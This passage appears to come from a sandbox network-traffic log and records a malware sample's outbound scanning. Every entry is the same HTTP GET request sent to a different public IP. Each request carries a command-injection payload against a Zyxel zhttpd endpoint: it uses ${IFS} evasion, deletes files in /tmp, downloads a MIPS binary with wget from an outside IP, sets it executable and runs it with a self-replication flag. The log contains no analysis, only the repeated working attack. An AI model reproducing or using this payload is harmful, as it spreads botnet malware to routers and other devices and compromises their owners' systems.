                                        Jan 14, 2024 16:18:40.346996069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2983192.168.2.1355744101.8.203.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347075939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2984192.168.2.1344678108.201.167.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347076893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2985192.168.2.13350788.78.60.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347135067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2986192.168.2.1354998150.215.15.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347160101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2987192.168.2.1350770184.179.89.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347191095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2988192.168.2.1353736190.162.227.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347218037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2989192.168.2.1332852174.116.135.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347301960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2990192.168.2.133308261.112.30.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347310066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2991192.168.2.133578889.197.165.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347316980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2992192.168.2.1357258173.70.41.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347387075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2993192.168.2.1336214220.185.167.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347425938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2994192.168.2.1337432137.163.190.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347476959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2995192.168.2.1359504197.90.86.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347526073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2996192.168.2.133924668.0.18.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347554922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2997192.168.2.1342098204.87.53.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347603083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2998192.168.2.1339926148.125.6.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347640038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2999192.168.2.1344478218.100.6.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347675085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3000192.168.2.1360930100.132.88.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347707987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3001192.168.2.133890662.51.252.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347762108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3002192.168.2.1352854216.140.182.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347796917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3003192.168.2.134643667.212.63.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347819090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3004192.168.2.134284677.135.53.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347858906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3005192.168.2.134769235.208.98.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347899914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3006192.168.2.1338090104.120.101.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.347954988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3007192.168.2.1356976101.247.112.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348001957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3008192.168.2.135334425.3.6.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348057032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3009192.168.2.1339142201.45.69.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348095894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3010192.168.2.1335540180.41.189.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348150015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3011192.168.2.1346184144.145.147.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348171949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3012192.168.2.1346478188.5.198.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348206043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3013192.168.2.1358120105.200.232.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348259926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3014192.168.2.133957419.64.216.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348300934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3015192.168.2.1336472105.198.250.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348354101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3016192.168.2.134911225.100.93.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348392963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3017192.168.2.1358624148.17.185.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348412037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3018192.168.2.136079472.23.33.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348448992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3019192.168.2.1345114172.97.202.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348491907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3020192.168.2.1355542175.103.15.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348546028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3021192.168.2.1359218125.140.189.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348593950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3022192.168.2.135245296.163.168.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348617077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3023192.168.2.134423296.86.80.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348670959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3024192.168.2.1339120205.179.110.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348711014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3025192.168.2.133490813.34.180.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348737955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3026192.168.2.135599234.131.226.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348757029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3027192.168.2.1336122189.114.20.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348809004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3028192.168.2.1342356109.253.195.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348865032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3029192.168.2.135474279.98.142.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.348890066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3030192.168.2.1343324188.110.72.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349004984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3031192.168.2.13366484.104.232.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349041939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3032192.168.2.1357008101.134.167.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349097013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3033192.168.2.135996814.135.132.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349143028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3034192.168.2.134181877.248.43.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349189997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3035192.168.2.1334516186.40.223.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349214077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3036192.168.2.1347896192.30.134.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349248886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3037192.168.2.135200671.40.147.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349277020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3038192.168.2.135397474.78.28.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349328995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3039192.168.2.1351630116.217.5.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349365950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3040192.168.2.1341632177.54.116.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349399090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3041192.168.2.1332786207.143.152.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349426031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3042192.168.2.135139271.47.19.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349452019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3043192.168.2.1358040157.34.32.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349490881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3044192.168.2.135114694.29.19.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349541903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3045192.168.2.1341896199.49.24.105443
                                        TimestampBytes transferredDirectionData
